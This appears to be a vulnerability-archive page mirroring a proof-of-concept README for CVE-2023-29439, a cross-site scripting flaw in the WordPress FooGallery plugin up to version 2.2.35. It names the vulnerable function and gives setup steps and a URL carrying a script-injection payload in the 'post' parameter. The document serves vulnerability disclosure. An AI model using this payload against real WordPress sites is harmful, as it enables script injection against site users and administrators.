关联漏洞
标题:WordPress plugin FooGallery 跨站脚本漏洞 (CVE-2023-29439)Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin FooGallery 2.2.35版本及之前版本存在跨站脚本漏洞。攻击者利用该漏洞执行跨站脚本攻击。
Description
PoC of CVE-2023-29439
介绍
# CVE-2023-29439
This repository is about XSS vulnerability in Wordpress Foogallery Plugin.
## Vulenerability details
### Description
In Foogallery 2.2.35 and earlier, the function `foogallery_image_editor_modal` in `foogallery/includes/admin/class-gallery-attachment-modal.php` is vulnerable to XSS attack.
### Pre-requisite
- Unauthenticated
### Proof-of-Concept
1. Foogallery Settings → Admin → Enable Advanced Attachment Modal
2. Send `http://localhost:8080/wp-admin/post-new.php?post_type=foogallery&post=”><script>alert(1)</script>`
## References
[CVE-2023-29439](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29439)
文件快照
[4.0K] /data/pocs/950f0e9db8f0ad32f5ca9eee3cd87cb82e527487
└── [ 647] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。